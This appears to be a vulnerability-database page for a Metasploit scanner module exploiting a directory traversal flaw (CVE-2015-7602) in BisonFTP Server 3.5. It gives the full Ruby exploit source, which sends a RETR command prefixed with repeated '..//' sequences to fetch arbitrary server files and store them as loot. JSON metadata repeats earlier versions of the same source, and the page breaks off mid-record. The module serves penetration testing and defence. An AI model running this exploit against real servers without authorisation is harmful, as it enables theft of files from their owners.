BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08T05:34:10
ID MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL Type metasploit Reporter Rapid7 Modified 2019-10-03T16:47:49
Description
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal sequences such as '..//'.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
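# Auxiliary scanner for the BisonWare BisonFTP Server 3.5 directory traversal
# tracked as CVE-2015-7602 (EDB 38341).
#
# The module fingerprints the server by its FTP banner (#check_host) and, in
# #run_host, issues a single RETR whose argument is the configured PATH
# prefixed with DEPTH repetitions of '..//'. Whatever comes back on the data
# connection (at most 1024 bytes) is stored as loot.
#
# For defenders: the request this module sends is an FTP RETR whose argument
# begins with a run of '..//' sequences, so FTP command logs and network
# captures containing such an argument are the observable trace of its use.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its two options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
        version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
        by crafting a RETR command including file system traversal strings such as '..//.'
      },
      'Platform'       => 'win',
      'Author'         =>
        [
          'Jay Turla', # @shipcod3, msf and initial discovery
          'James Fitts',
          'Brad Wolfe <brad.wolfe[at]gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '38341'],
          [ 'CVE', '2015-7602']
        ],
      'DisclosureDate' => 'Sep 28 2015'
    ))

    register_options(
      [
        # Number of '..//' prefixes put in front of PATH (default 32).
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
        # File requested once the prefix has been applied (default boot.ini).
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
      ])
  end

  # Fingerprints the target by its FTP banner only; no traversal request is
  # sent. A match therefore means "this looks like BisonFTP V3.5", not that a
  # file was actually disclosed.
  #
  # @param ip [String] host under test (unused here; the FTP mixin connects
  #   to the configured target)
  # @return [Exploit::CheckCode] Appears when the banner names BisonFTP V3.5,
  #   Safe otherwise
  def check_host(ip)
    connect
    return Exploit::CheckCode::Appears if /BisonWare BisonFTP server product V3\.5/i.match?(banner)

    Exploit::CheckCode::Safe
  ensure
    # Always release the control connection, matched banner or not.
    disconnect
  end

  # Requests PATH through the traversal prefix and stores the returned bytes
  # as loot. Connection-level failures are logged and swallowed so that a
  # scan over many hosts keeps going.
  #
  # @param target_host [String] host under test (unused here; the FTP mixin
  #   connects to the configured target)
  # @return [void]
  def run_host(target_host)
    connect_login

    # A distinct local name keeps the data connection apart from the
    # control-connection accessor the mixins expose under the name `sock`.
    data_sock = data_connect

    # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
    # and #7582
    if data_sock.nil?
      # Built by interpolation: appending to __FILE__ with << mutates that
      # string and fails outright when string literals are frozen.
      error_msg = "#{__FILE__}::#{__method__}:data_connect failed; possible invalid response"
      print_status(error_msg)
      elog(error_msg)
      return
    end

    file_path = datastore['PATH']
    file = ::File.basename(file_path)

    # The RETR argument is DEPTH copies of '..//' followed by PATH. The
    # control-channel reply is not inspected; only the data connection is read.
    retr_cmd = "#{'..//' * datastore['DEPTH']}#{file_path}"
    send_cmd(['RETR', retr_cmd])

    # The local was nil-checked above and cannot change in between, so it is
    # not re-tested here. Only the first 1024 bytes are read, which means the
    # stored loot can be a truncated copy of a larger file.
    response_data = data_sock.read(1024)

    unless response_data
      print_error("#{file} not found")
      return
    end

    if response_data.empty?
      print_status("File (#{file_path})from #{peer} is empty...")
      return
    end

    # store file data to loot
    loot_file = store_loot('bisonware.ftp.data', 'text', rhost, response_data, file, file_path)
    vprint_status("Data returned:\n")
    vprint_line(response_data)
    print_good("Stored #{file_path} to #{loot_file}")
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE => e
    # Both original rescue clauses had the same body, so they are merged.
    vprint_error(e.message)
    elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
  ensure
    # Close the data connection first, then the control connection, on every
    # exit path, including the early returns above.
    data_disconnect
    disconnect
  end
end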
{"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-11-22T08:34:01", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-02T23:18:07", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-02T23:18:07", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-24T19:57:27", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-24T19:57:27", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-08-21T15:29:17", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-08-21T15:29:17", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-08-21T15:29:17", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-28T22:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-28T22:01:18", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-28T22:01:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-29T00:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-29T00:01:18", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-29T00:01:18", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T10:10:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T10:10:12", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
